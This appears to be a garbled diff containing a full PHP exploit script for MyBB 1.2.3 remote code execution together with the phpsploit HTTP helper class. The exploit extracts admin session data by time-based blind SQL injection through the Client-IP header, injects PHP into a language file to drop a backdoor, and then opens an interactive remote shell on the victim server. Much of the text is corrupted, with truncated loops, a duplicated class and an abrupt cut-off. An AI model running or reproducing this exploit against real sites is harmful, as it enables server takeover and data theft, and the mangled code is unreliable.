- *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
- *  * New: You can now call the getheader() / getcontent() function without parameters
- *
- * [2006-12-30] (1.0)
- *  * First version
- * 
- */
-
-class phpsploit {
-
-	/**
-	 * This function is called by the get()/post() functions.
-	 * You don't have to call it, this is the main function.
-	 *
-	 * @return $server_response
-	 */
-	private function sock()
-	{
-		if(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport);
-		else $socket = fsockopen($this->host,$this->port);
-		
-		if(!$socket) die("Error: The host doesn't exist");
-		
-		if($this->method==="get") $this->packet = "GET ".$this->url." HTTP/1.1\r\n";
-		elseif($this->method==="post" or $this->method==="formdata") $this->packet = "POST ".$this->url. " HTTP/1.1\r\n";
-		else die("Error: Invalid method");
-		
-		if(!empty($this->proxyuser)) $this->packet .= "Proxy-Authorization: Basic ".base64_encode($this->proxyuser.":".$this->proxypass)."\r\n";
-		$this->packet .= "Host: ".$this->host."\r\n";
-		
-		if(!empty($this->agent))  $this->packet .= "User-Agent: ".$this->agent."\r\n";
-		if(!empty($this->header)) $this->packet .= $this->header."\r\n";
-		if(!empty($this->cookie)) $this->packet .= "Cookie: ".$this->cookie."\r\n";
-		
-		$this->packet .= "Connection: Close\r\n";
-		if($this->method==="post")
-		{
-			$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
-			$this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n";
-			$this->packet .= $this->data."\r\n";
-		}
-		elseif($this->method==="formdata")
-		{
-			$this->packet .= "Content-Type: multipart/form-data; boundary=---------------------------".$this->boundary."\r\n";
-			$this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n";
-			$this->packet .= $this->data;
-		}
-		$this->packet .= "\r\n";
-		$this->recv = '';
-		
-		fputs($socket,$this->packet);
-		while(!feof($socket)) $this->recv .= fgets($socket);
-		fclose($socket);
-		
-		if($this->cookiejar) $this->cookiejar($this->getheader($this->recv));
-		if($this->allowredirection) return $this->allowredirection($this->recv);
-		else return $this->recv;
-	}
-	
-
-	/**
-	 * This function allows you to add several cookie in the
-	 * request. Several methods are supported:
-	 * 
-	 * $this->addcookie("name","value");
-	 * or
-	 * $this->addcookie("name=newvalue");
-	 * or
-	 * $this->addcookie("othername=overvalue; xx=zz; y=u");
-	 * 
-	 * @param string $cookiename
-	 * @param string $cookievalue
-	 * 
-	 */
-	public function addcookie($cookn,$cookv='')
-	{
-		// $this->addcookie("name","value"); work avec replace
-		if(!empty($cookv))
-		{
-			if($cookv === "deleted") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete
-			if(!empty($this->cookie))
-			{
-			    if(preg_match("/$cookn=/",$this->cookie))
-			    {
-			    	$this->cookie = preg_replace("/$cookn=(\S*);/","$cookn=$cookv;",$this->cookie);
-			    }
-			    else
-			    {
-			    	$this->cookie .= " ".$cookn."=".$cookv.";"; // " ".
-			    }
-			}
-			else
-			{
-				$this->cookie = $cookn."=".$cookv.";";
-			}
-		}
-		// $this->addcookie("name=value; othername=othervalue");
-		else
-		{
-	    	 if(!empty($this->cookie))
-	    	 {
-	    	 	$cookn = preg_replace("/(.*);$/","$1",$cookn);
-	    	 	$cookarr = explode(";",str_replace(" ", "",$cookn));
-	    	 	for($i=0;$iaddcookie($cookn,$cookv);
-	    	 	}
-	    	 }
-			 else
-			 {
-			 	$cookn = ((substr($cookn,(strlen($cookn)-1),1))===";") ? $cookn : $cookn.";";
-			 	$this->cookie = $cookn;			
-			 }
-		}
-	}
-	
-	
-	/**
-	 * This function allows you to add several headers in the
-	 * request. Several methods are supported:
-	 *
-	 * $this->addheader("headername","headervalue");
-	 * or
-	 * $this->addheader("headername: headervalue");
-	 *
-	 * @param string $headername
-	 * @param string $headervalue
-	 */
-	public function addheader($headern,$headervalue='')
-	{
-		// $this->addheader("name","value");
-		if(!empty($headervalue))
-		{
-			if(!empty($this->header))
-			{
-				if(preg_match("/$headern:/",$this->header))
-				{
-					$this->header = preg_replace("/$headern: (\S*)/","$headern: $headervalue",$this->header);
-				}
-				else
-				{
-					$this->header .= "\r\n".$headern.": ".$headervalue;
-				}
-			}
-			else
-			{
-				$this->header=$headern.": ".$headervalue;
-			}
-		}
-		// $this->addheader("name: value");
-		else 
-		{
-			if(!empty($this->header))
-			{
-				$headarr = explode(": ",$headern);
-				$headern = $headarr[0];
-				$headerv = $headarr[1];
-				$this->addheader($headern,$headerv);
-			}
-			else
-			{
-				$this->header=$headern;
-			}
-		}
-	}
-	
-
-	/**
-	 * This function allows you to use an http proxy server.
-	 * Several methods are supported:
-	 * 
-	 * $this->proxy("proxyip","8118");
-	 * or
-	 * $this->proxy("proxyip:8118")
-	 *
-	 * @param string $proxyhost
-	 * @param integer $proxyport
-	 */
-	public function proxy($proxy,$proxyp='')
-	{
-		// $this->proxy("localhost:8118");
-		if(empty($proxyp))
-		{
-			preg_match("/^(\S*):(\d+)$/",$proxy,$proxarr);
-			$proxh = $proxarr[1];
-			$proxp = $proxarr[2];
-			$this->proxyhost=$proxh;
-			$this->proxyport=$proxp;
-		}
-		// $this->proxy("localhost",8118);
-		else 
-		{
-			$this->proxyhost=$proxy;
-			$this->proxyport=intval($proxyp);
-		}
-		if($this->proxyport > 65535) die("Error: Invalid port number");
-	}
-	
-
-	/**
-	 * This function allows you to use an http proxy server
-	 * which requires a basic authentification. Several
-	 * methods are supported:
-	 * 
-	 * $this->proxyauth("darkfig","dapasswd");
-	 * or
-	 * $this->proxyauth("darkfig:dapasswd");
-	 *
-	 * @param string $proxyuser
-	 * @param string $proxypass
-	 */
-	public function proxyauth($proxyauth,$proxypasse='')
-	{
-		// $this->proxyauth("darkfig:password");
-		if(empty($proxypasse))
-		{
-			preg_match("/^(.*):(.*)$/",$proxyauth,$proxautharr);
-			$proxu = $proxautharr[1];
-			$proxp = $proxautharr[2];
-			$this->proxyuser=$proxu;
-			$this->proxypass=$proxp;
-		}
-		// $this->proxyauth("darkfig","password");
-		else
-		{
-			$this->proxyuser=$proxyauth;
-			$this->proxypass=$proxypasse;
-		}
-	}
-
-	
-	/**
-	 * This function allows you to set the "User-Agent" header.
-	 * Several methods are possible to do that:
-	 * 
-	 * $this->agent("Mozilla Firefox");
-	 * or
-	 * $this->addheader("User-Agent: Mozilla Firefox");
-	 * or
-	 * $this->addheader("User-Agent","Mozilla Firefox");
-	 * 
-	 * @param string $useragent
-	 */
-	public function agent($useragent)
-	{
-		$this->agent=$useragent;
-	}
-
-	
-	/**
-	 * This function returns the header which will be
-	 * in the next request.
-	 * 
-	 * $this->showheader();
-	 *
-	 * @return $header
-	 */
-	public function showheader()
-	{
-		return $this->header;
-	}
-
-	
-	/**
-	 * This function returns the cookie which will be
-	 * in the next request.
-	 * 
-	 * $this->showcookie();
-	 *
-	 * @return $storedcookies
-	 */
-	public function showcookie()
-	{
-		return $this->cookie;
-	}
-
-	
-	/**
-	 * This function returns the last formed
-	 * http request (the http packet).
-	 * 
-	 * $this->showlastrequest();
-	 * 
-	 * @return $last_http_request
-	 */
-	public function showlastrequest()
-	{
-		return $this->packet;
-	}
-	
-	
-	/**
-	 * This function sends the formed http packet with the
-	 * GET method. You can precise the port of the host.
-	 * 
-	 * $this->get("http://localhost");
-	 * $this->get("http://localhost:888/xd/tst.php");
-	 * 
-	 * @param string $urlwithpath
-	 * @return $server_response
-	 */
-	public function get($url)
-	{
-		$this->target($url);
-		$this->method="get";
-		return $this->sock();
-	}
-
-	
-	/**
-	 * This function sends the formed http packet with the
-	 * POST method. You can precise the port of the host.
-	 * 
-	 * $this->post("http://localhost/index.php","admin=1&user=dark");
-	 *
-	 * @param string $urlwithpath
-	 * @param string $postdata
-	 * @return $server_response
-	 */	
-	public function post($url,$data)
-	{
-		$this->target($url);
-		$this->method="post";
-		$this->data=$data;
-		return $this->sock();
-	}
-	
-
-	/**
-	 * This function sends the formed http packet with the
-	 * POST method using the multipart/form-data enctype. 
-	 * 
-	 * $array = array(
-	 *          frmdt_url      => "http://localhost/upload.php",
-	 *          frmdt_boundary => "123456",                    # Optional
-	 *                 "email" => "me@u.com",
-	 *               "varname" => array(
-	 *                            frmdt_type => "image/gif",   # Optional
-	 *                       frmdt_transfert => "binary",      # Optional
-	 *                        frmdt_filename => "hello.php",
-	 *                         frmdt_content => ""));
-	 * $this->formdata($array);
-	 *
-	 * @param array $array
-	 * @return $server_response
-	 */
-	public function formdata($array)
-	{
-		$this->target($array[frmdt_url]);
-		$this->method="formdata";
-		$this->data='';
-		if(!isset($array[frmdt_boundary])) $this->boundary="phpsploit";
-		else $this->boundary=$array[frmdt_boundary];
-		foreach($array as $key => $value)
-		{
-			if(!preg_match("#^frmdt_(boundary|url)#",$key))
-			{
-				$this->data .= "-----------------------------".$this->boundary."\r\n";
-				$this->data .= "Content-Disposition: form-data; name=\"".$key."\";";
-				if(!is_array($value))
-				{
-					$this->data .= "\r\n\r\n".$value."\r\n";
-				}
-				else
-				{
-					$this->data .= " filename=\"".$array[$key][frmdt_filename]."\";\r\n";
-					if(isset($array[$key][frmdt_type])) $this->data .= "Content-Type: ".$array[$key][frmdt_type]."\r\n";
-					if(isset($array[$key][frmdt_transfert])) $this->data .= "Content-Transfer-Encoding: ".$array[$key][frmdt_transfert]."\r\n";
-					$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
-				}
-			}
-		}
-		$this->data .= "-----------------------------".$this->boundary."--\r\n";
-		return $this->sock();
-	}
-
-	
-	/**
-	 * This function returns the content of the server response
-	 * without the headers.
-	 * 
-	 * $this->getcontent($this->get("http://localhost/"));
-	 * or
-	 * $this->getcontent();
-	 *
-	 * @param string $server_response
-	 * @return $onlythecontent
-	 */
-	public function getcontent($code='')
-	{
-		if(empty($code)) $code = $this->recv;
-		$content = explode("\n",$code);
-		$onlycode = '';
-		for($i=1;$igetheader($this->post("http://localhost/x.php","x=1&z=2"));
-	 * or
-	 * $this->getheader();
-	 *
-	 * @param string $server_response
-	 * @return $onlytheheaders
-	 */
-	public function getheader($code='')
-	{
-		if(empty($code)) $code = $this->recv;
-		$header = explode("\n",$code);
-		$onlyheader = $header[0]."\n";
-		for($i=1;$iaddcookie($cookn,$cookv);
-		}
-    }
-
-	
-	/**
-	 * This function is called by the get()/post() functions.
-	 * You don't have to call it.
-	 *
-	 * @param string $urltarg
-	 */
-	private function target($urltarg)
-	{
-		if(!preg_match("/^http:\/\/(.*)\//",$urltarg)) $urltarg .= "/";
-		$this->url=$urltarg;
-		
-		$array = explode("/",str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg)));
-		$this->host=$array[0];
-
-		preg_match("/:(\d+)\//",$urltarg,$matches);
-		$this->port=empty($matches[1]) ? 80 : $matches[1];
-		
-		$temp = str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg));
-		preg_match("/\/(.*)\//",$temp,$matches);
-		$this->path=str_replace("//","/","/".$matches[1]."/");
-	
-		if($this->port > 65535) die("Error: Invalid port number");
-	}
-	
-	
-	/**
-	 * If you call this function, the script will
-	 * extract all "Set-Cookie" headers values
-	 * and it will automatically add them into the "Cookie" header
-	 * for all next requests.
-	 *
-	 * $this->cookiejar(1); // enabled
-	 * $this->cookiejar(0); // disabled
-	 * 
-	 */
-	public function cookiejar($code)
-	{
-		if($code===0) $this->cookiejar='';
-		if($code===1) $this->cookiejar=1;
-		else
-		{
-			$this->getcookie($code);
-		}
-	}
-
-
-	/**
-	 * If you call this function, the script will
-	 * follow all redirections sent by the server.
-	 * 
-	 * $this->allowredirection(1); // enabled
-	 * $this->allowredirection(0); // disabled
-	 * 
-	 * @return $this->get($locationresponse)
-	 */
-	public function allowredirection($code)
-	{
-		if($code===0) $this->allowredirection='';
-		if($code===1) $this->allowredirection=1;
-		else
-		{
-			if(preg_match("/(location|content-location|uri): (.*)/i",$code,$codearr))
-			{
-				$location = str_replace(chr(13),'',$codearr[2]);
-				if(!eregi("://",$location))
-				{
-					return $this->get("http://".$this->host.$this->path.$location);
-				}
-				else
-				{
-					return $this->get($location);
-				}
-			}
-			else
-			{
-				return $code;
-			}
-		}
-	}
-	
-	
-	/**
-	 * This function allows you to reset some parameters:
-	 * 
-	 * $this->reset(header); // headers cleaned
-	 * $this->reset(cookie); // cookies cleaned
-	 * $this->reset();       // clean all parameters
-	 *
-	 * @param string $func
-	 */
-	public function reset($func='')
-	{
-		switch($func)
-		{
-			case "header":
-			$this->header='';
-			break;
-			
-			case "cookie":
-			$this->cookie='';
-			break;
-			
-			default:
-		        $this->cookiejar='';
-		        $this->header='';
-		        $this->cookie='';
-		        $this->allowredirection=''; 
-		        $this->agent='';
-		        break;
-		}
-	}
-}
-?>
-
-# milw0rm.com [2007-04-03]
+#!/usr/bin/php
+escape_string.
+# They don't corrected the function (this is a choice ... the bad) and they forgot to correct 1 (only) SQL request.
+# They must correct the problem at the source =)
+#
+if($argc < 3)
+{
+print("
+---  MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit  ---
+-----------------------------------------------------------------------
+PHP conditions: none
+       Credits: DarkFig 
+           URL: http://www.acid-root.new.fr/
+-----------------------------------------------------------------------
+  Usage: $argv[0] -url http://victim.com/ [Options]
+ Params: -url       For example http://victim.com/myBB/
+Options: -debug     Debug mod activated (debug_mybb.html)
+         -truetime  Server response time which returns true
+         -benchmark You can change the value used in benchmark()
+         -proxy     If you wanna use a proxy  
+         -proxyauth Basic authentification 
+   Note: If you have some problems use -debug, -benchmark, -truetime
+-----------------------------------------------------------------------
+");exit(1);
+}
+
+$url       = getparam('url',1);
+$debug     = (getparam('debug')!='')     ? 1 : 0;
+$benchmark = (getparam('benchmark')!='') ? getparam('benchmark') : '1000000';
+$proxy     = getparam($proxy);
+$proxyauth = getparam($proxyauth);
+
+$backdoor  = 'uploads/avatars/backdoor.php'; # inc/cache/backdoor.php
+$filetoed  = 'index.lang.php';
+
+$xpl = new phpsploit();
+$xpl->agent('Firefox');
+if($proxy) $xpl->proxy($proxy);
+if($proxyauth) $xpl->proxyauth($proxyauth);
+if($debug) debug(1);
+
+# There is two solutions to be logged in as administrator.
+#
+# SOLUTION NUMBER 1
+# mysql> select * from mybb_users\G
+# *************************** 1. row ***************************
+#              uid: 1
+#         username: root
+#         password: 39ac8681f5cf4fcd9c9c09719a618bd3
+#             salt: BFeJBOCF
+#         loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA...
+#
+# $xpl->post($url.'admin/index.php','username=root&password=toor&do=login&goto=');
+# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
+# 
+# SOLUTION NUMBER 2
+# mysql> select * from mybb_adminsessions\G
+# *************************** 1. row ***************************
+#        sid: 81e267263b9254f3aaf670383bfbfec9
+#        uid: 1
+#   loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA
+#         ip: 127.0.0.1
+#   dateline: 1175443967
+# lastactive: 1175444369
+#
+# $xpl->addheader('Client-IP','127.0.0.1');
+# $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9');
+# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
+#
+# I decided to use the solution number 2.
+# We can also add an administrator (easily) ... but it's not interesting.
+#
+print "\nAdmin IP : "; $ip  = sql_inject('ip');
+print "\nAdmin sid: "; $sid = sql_inject('sid');
+print "\nTrying to be logged in as administrator";
+
+$xpl->addheader('Client-IP',$ip);
+$xpl->get($url."admin/languages.php?adminsid=$sid");
+
+# Trying to find the language
+if(preg_match('#getcontent(),$langmatches)) $lang=$langmatches[1];
+else $lang='english';
+print "\nLanguage: $lang";
+
+# Language configuration
+$xpl->get($url."admin/languages.php?adminsid=$sid&action=edit&lang=$lang&editwith=0&file=$filetoed");
+preg_match_all('#name="(.*)">(.*)</textarea>#',$xpl->getcontent(),$name_value);
+
+# We can't use:
+# - 
+# - ' OR "
+#
+$PHPCODE = '${${error_reporting(0)}}'
+          .'${${$handle=fopen('.chrit('./'.$backdoor).','.chrit('w').')}}'
+          .'${${fwrite($handle,'.chrit('').')}}'
+          .'${${fclose($handle)}}';
+$name_value[2][0] .= $PHPCODE;
+
+$postdata=array(frmdt_url => $url.'admin/languages.php',
+               "adminsid" => $sid, "action" => "do_edit",
+               "lang" => $lang, "editwith" => 0,
+               "inadmin"=> 0, "file"=> $filetoed,
+               "Update Language Variables"=>"  Update Language Variables");
+
+for($i=0;$ishowlastrequest();
+$xpl->formdata($postdata);
+
+# Trying to execute the php code
+$xpl->get($url.'index.php');
+
+# If not the default language
+$xpl->get($url.'inc/languages/'.$lang.'/'.$filetoed);
+print "\nThe php file should be created\n\$shell> ";
+
+# Hello master
+while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
+{
+    # ');include('../../inc/config.php');print $config['password'];//
+    $xpl->addheader('Shell',"system('$cmd');");
+    $xpl->get($url.$backdoor);
+    print $xpl->getcontent()."\n\$shell> ";
+}
+
+function sql_inject($field)
+{
+	global $xpl,$url,$prefix,$debug,$result,$bef,$aft,$truetime,$benchmark,$a,$b,$sub,$f; #,$fakeip
+	$sub=0;$string='';
+	
+	if($field=='ip') {$a='44';$b='57';} # . 0-9
+	else {$a='46';$b='70';}             # 0-9 A-Z
+	
+	while(TRUE)
+	{
+		$sub++;
+		for($i=$a;$i<=$b;$i++)
+		{
+			# Random ip
+			$fakeip = rand(128,254).'.'
+			         .rand(128,254).'.'
+			         .rand(128,254).'.'
+			         .rand(128,254);
+
+			# Calculation of the server response time which returns TRUE
+			if($i==$a) $f='TST';
+			
+			# End of the string ?
+			elseif($i==($a+1)) $f='NULL';
+			
+			# Test the char
+			else $f=$i;
+			
+			# Table prefix
+			if($sub==1 AND $i==$a)
+			{
+				$xpl->addheader('Client-IP',$fakeip."'");
+				$xpl->get($url.'index.php');
+
+				if(preg_match("#DELETE FROM (\S*)sessions#i",$xpl->getcontent(),$match)) $prefix=$match[1];
+				else $prefix='mybb_';
+			}
+
+			# +-class_session.php (#2)
+			# |
+			# 475.	function create_session($uid=0)
+			# 476.	{
+			# 477.		global $db;
+			# 478.		$speciallocs = $this->get_special_locations();
+			# 479.
+			# 480.		// If there is a proper uid, delete by uid.
+			# 481.		if($uid > 0)
+			# 482.		{
+			# 483.			$db->delete_query(TABLE_PREFIX."sessions", "uid=".$uid);
+			# 484.			$onlinedata['uid'] = $uid;
+			# 485.		}
+			# 486.		// Else delete by ip.
+			# 487.		else
+			# 488.		{   // $this->ipaddress = get_ip();
+			# 489.			$db->delete_query(TABLE_PREFIX."sessions", "ip='".$this->ipaddress."'");
+			# 490.			$onlinedata['uid'] = 0;
+			# 491.		}
+			#
+			$sql  = $fakeip."' OR ip=(SELECT IF(SUBSTR(";
+			$sql .= ($f=='TST') ? "(SELECT 1)" : "(SELECT $field FROM ${prefix}adminsessions ORDER BY lastactive DESC LIMIT 1)";
+			$sql .= ($f=='TST') ? ",1" : ",$sub";
+			$sql .= ($f=='TST') ? ",1)=CHAR(49)" : ",1)=CHAR($f)";
+			$sql .= ",BENCHMARK($benchmark,CHAR(66)),1)) #";
+
+
+			# +-functions.php (#1)
+			# |
+			# 1836. function get_ip()
+			# 1837. {
+			# 1838.	if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
+			# 1839.	{
+			# 1840.		if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $addresses))
+			# 1841.		{
+			# 1842.			foreach($addresses[0] as $key => $val)
+			# 1843.			{
+			# 1844.				if(!preg_match("#^(10|172\.16|192\.168)\.#", $val))
+			# 1845.				{
+			# 1846.					$ip = $val;
+			# 1847.					break;
+			# 1848.				}
+			# 1849.			}
+			# 1850.		}
+			# 1851.	}
+			# 1852.	if(!isset($ip))
+			# 1853.	{
+			# 1854.		if(isset($_SERVER['HTTP_CLIENT_IP']))
+			# 1855.		{
+			# 1856.			$ip = $_SERVER['HTTP_CLIENT_IP'];
+			# 1857.		}
+			# 1858.		else
+			# 1859.		{
+			# 1860.			$ip = $_SERVER['REMOTE_ADDR'];
+			# 1861.		}
+			# 1862.	}
+			# 1863.	return $ip;
+			# 1864. }
+			#
+			$bef = time();
+			$xpl->reset('header');
+			$xpl->addheader('Client-IP',$sql);
+			$xpl->get($url.'index.php');
+			$aft = time();
+			
+			if($f=='TST') $truetime=$aft-$bef;
+			if(getparam('truetime')!='') $truetime=getparam('truetime');
+			
+			# Server response time >= Server response time which returns TRUE ?
+			$restime = $aft-$bef;
+			if($restime >= $truetime AND $f != 'TST') $result='TRUE';
+			else $result='FALSE';
+
+			# Debug mode activated
+			if($debug) debug('',$field);
+			
+			# The tested char returns TRUE
+			if($result=='TRUE')
+			{
+				if($f!='NULL')
+				{
+					# Continue
+					print strtolower(chr($f));
+					$string .= chr($f);
+					break;
+				}
+				else
+				{
+					# End of the string
+					$xpl->reset('header');
+					return $string;
+				}
+			}
+			
+			# Retry if no char found
+			if($f==$b) $sub--;
+		}
+	}
+}
+
+function debug($init='',$dafield='')
+{
+	global $result,$bef,$aft,$truetime,$benchmark,$a,$b,$sub,$f; #,$fakeip
+	if($init)
+	{
+		$handle = fopen("debug_mybb.html","w+");
+		$data = "
    MyBulletinBoard (MyBB) <= 1.2.3 Code Execution Exploit
    
+		
    REQUEST TIMERESPONSE TIMETRUETIMEBENCHMARKRESULTIPFIELDCHARSETSUBSTR()ORD()CHAR() ".htmlentities($bef)."  ".htmlentities($aft)."  ".htmlentities($truetime)."  ".htmlentities($benchmark)."  ".htmlentities($result)."  ".htmlentities($fakeip)."  ".htmlentities($dafield)."  ".htmlentities("$a-$b")."  ".htmlentities($sub)."  ".htmlentities($f)."  ".htmlentities(chr($f))." 
    
+		
+		
+		
+		
+		";
+		# 
+		$data .= "
+		
+		
+		
+		";
+		fwrite($handle,$data);
+		fclose($handle);
+	}
+	else
+	{
+		$handle = fopen("debug_mybb.html","a");
+		$data   = "
+		
+		
+		
+		
+		";
+		# 
+		$data .= "
+		
+		
+		
+		";
+		fwrite($handle,$data);
+		fclose($handle);
+	}
+}
+
+function chrit($string)
+{
+	$char = '';
+	for($i=0;$i $key)
+	{
+		if($key == '-'.$param) {
+		   if(!empty($argv[$value+1])) return $argv[$value+1];
+		   else return 1;
+		}
+	}
+	if($opt) exit("\n-$param parameter required");
+	else return;
+}
+
+/*
+ * 
+ * Copyright (C) darkfig
+ * 
+ * This program is free software; you can redistribute it and/or 
+ * modify it under the terms of the GNU General Public License 
+ * as published by the Free Software Foundation; either version 2 
+ * of the License, or (at your option) any later version. 
+ * 
+ * This program is distributed in the hope that it will be useful, 
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of 
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
+ * GNU General Public License for more details. 
+ * 
+ * You should have received a copy of the GNU General Public License 
+ * along with this program; if not, write to the Free Software 
+ * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
+ * 
+ * TITLE:          PhpSploit Class
+ * REQUIREMENTS:   PHP 5 (remove "private", "public" if you have PHP 4)
+ * VERSION:        1.2
+ * LICENSE:        GNU General Public License
+ * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
+ * FILENAME:       phpsploitclass.php
+ *
+ * CONTACT:        gmdarkfig@gmail.com (french / english)
+ * GREETZ:         Sparah, Ddx39
+ *
+ * DESCRIPTION:
+ * The phpsploit is a class implementing a web user agent.
+ * You can add cookies, headers, use a proxy server with (or without) a
+ * basic authentification. It supports the GET and the POST method. It can
+ * also be used like a browser with the cookiejar() function (which allow
+ * a server to add several cookies for the next requests) and the
+ * allowredirection() function (which allow the script to follow all
+ * redirections sent by the server). It can return the content (or the
+ * headers) of the request. Others useful functions can be used for debugging.
+ * A manual is actually in development but to know how to use it, you can
+ * read the comments.
+ *
+ * CHANGELOG:
+ * [2007-01-24] (1.2)
+ *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
+ *  * New: multipart/form-data enctype is now supported 
+ *
+ * [2006-12-31] (1.1)
+ *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
+ *  * New: You can now call the getheader() / getcontent() function without parameters
+ *
+ * [2006-12-30] (1.0)
+ *  * First version
+ * 
+ */
+
+class phpsploit {
+
+	/**
+	 * This function is called by the get()/post() functions.
+	 * You don't have to call it, this is the main function.
+	 *
+	 * @return $server_response
+	 */
+	private function sock()
+	{
+		if(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport);
+		else $socket = fsockopen($this->host,$this->port);
+		
+		if(!$socket) die("Error: The host doesn't exist");
+		
+		if($this->method==="get") $this->packet = "GET ".$this->url." HTTP/1.1\r\n";
+		elseif($this->method==="post" or $this->method==="formdata") $this->packet = "POST ".$this->url. " HTTP/1.1\r\n";
+		else die("Error: Invalid method");
+		
+		if(!empty($this->proxyuser)) $this->packet .= "Proxy-Authorization: Basic ".base64_encode($this->proxyuser.":".$this->proxypass)."\r\n";
+		$this->packet .= "Host: ".$this->host."\r\n";
+		
+		if(!empty($this->agent))  $this->packet .= "User-Agent: ".$this->agent."\r\n";
+		if(!empty($this->header)) $this->packet .= $this->header."\r\n";
+		if(!empty($this->cookie)) $this->packet .= "Cookie: ".$this->cookie."\r\n";
+		
+		$this->packet .= "Connection: Close\r\n";
+		if($this->method==="post")
+		{
+			$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+			$this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n";
+			$this->packet .= $this->data."\r\n";
+		}
+		elseif($this->method==="formdata")
+		{
+			$this->packet .= "Content-Type: multipart/form-data; boundary=---------------------------".$this->boundary."\r\n";
+			$this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n";
+			$this->packet .= $this->data;
+		}
+		$this->packet .= "\r\n";
+		$this->recv = '';
+		
+		fputs($socket,$this->packet);
+		while(!feof($socket)) $this->recv .= fgets($socket);
+		fclose($socket);
+		
+		if($this->cookiejar) $this->cookiejar($this->getheader($this->recv));
+		if($this->allowredirection) return $this->allowredirection($this->recv);
+		else return $this->recv;
+	}
+	
+
+	/**
+	 * This function allows you to add several cookie in the
+	 * request. Several methods are supported:
+	 * 
+	 * $this->addcookie("name","value");
+	 * or
+	 * $this->addcookie("name=newvalue");
+	 * or
+	 * $this->addcookie("othername=overvalue; xx=zz; y=u");
+	 * 
+	 * @param string $cookiename
+	 * @param string $cookievalue
+	 * 
+	 */
+	public function addcookie($cookn,$cookv='')
+	{
+		// $this->addcookie("name","value"); work avec replace
+		if(!empty($cookv))
+		{
+			if($cookv === "deleted") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete
+			if(!empty($this->cookie))
+			{
+			    if(preg_match("/$cookn=/",$this->cookie))
+			    {
+			    	$this->cookie = preg_replace("/$cookn=(\S*);/","$cookn=$cookv;",$this->cookie);
+			    }
+			    else
+			    {
+			    	$this->cookie .= " ".$cookn."=".$cookv.";"; // " ".
+			    }
+			}
+			else
+			{
+				$this->cookie = $cookn."=".$cookv.";";
+			}
+		}
+		// $this->addcookie("name=value; othername=othervalue");
+		else
+		{
+	    	 if(!empty($this->cookie))
+	    	 {
+	    	 	$cookn = preg_replace("/(.*);$/","$1",$cookn);
+	    	 	$cookarr = explode(";",str_replace(" ", "",$cookn));
+	    	 	for($i=0;$iaddcookie($cookn,$cookv);
+	    	 	}
+	    	 }
+			 else
+			 {
+			 	$cookn = ((substr($cookn,(strlen($cookn)-1),1))===";") ? $cookn : $cookn.";";
+			 	$this->cookie = $cookn;			
+			 }
+		}
+	}
+	
+	
+	/**
+	 * This function allows you to add several headers in the
+	 * request. Several methods are supported:
+	 *
+	 * $this->addheader("headername","headervalue");
+	 * or
+	 * $this->addheader("headername: headervalue");
+	 *
+	 * @param string $headername
+	 * @param string $headervalue
+	 */
+	public function addheader($headern,$headervalue='')
+	{
+		// $this->addheader("name","value");
+		if(!empty($headervalue))
+		{
+			if(!empty($this->header))
+			{
+				if(preg_match("/$headern:/",$this->header))
+				{
+					$this->header = preg_replace("/$headern: (\S*)/","$headern: $headervalue",$this->header);
+				}
+				else
+				{
+					$this->header .= "\r\n".$headern.": ".$headervalue;
+				}
+			}
+			else
+			{
+				$this->header=$headern.": ".$headervalue;
+			}
+		}
+		// $this->addheader("name: value");
+		else 
+		{
+			if(!empty($this->header))
+			{
+				$headarr = explode(": ",$headern);
+				$headern = $headarr[0];
+				$headerv = $headarr[1];
+				$this->addheader($headern,$headerv);
+			}
+			else
+			{
+				$this->header=$headern;
+			}
+		}
+	}
+	
+
+	/**
+	 * This function allows you to use an http proxy server.
+	 * Several methods are supported:
+	 * 
+	 * $this->proxy("proxyip","8118");
+	 * or
+	 * $this->proxy("proxyip:8118")
+	 *
+	 * @param string $proxyhost
+	 * @param integer $proxyport
+	 */
+	public function proxy($proxy,$proxyp='')
+	{
+		// $this->proxy("localhost:8118");
+		if(empty($proxyp))
+		{
+			preg_match("/^(\S*):(\d+)$/",$proxy,$proxarr);
+			$proxh = $proxarr[1];
+			$proxp = $proxarr[2];
+			$this->proxyhost=$proxh;
+			$this->proxyport=$proxp;
+		}
+		// $this->proxy("localhost",8118);
+		else 
+		{
+			$this->proxyhost=$proxy;
+			$this->proxyport=intval($proxyp);
+		}
+		if($this->proxyport > 65535) die("Error: Invalid port number");
+	}
+	
+
+	/**
+	 * This function allows you to use an http proxy server
+	 * which requires a basic authentification. Several
+	 * methods are supported:
+	 * 
+	 * $this->proxyauth("darkfig","dapasswd");
+	 * or
+	 * $this->proxyauth("darkfig:dapasswd");
+	 *
+	 * @param string $proxyuser
+	 * @param string $proxypass
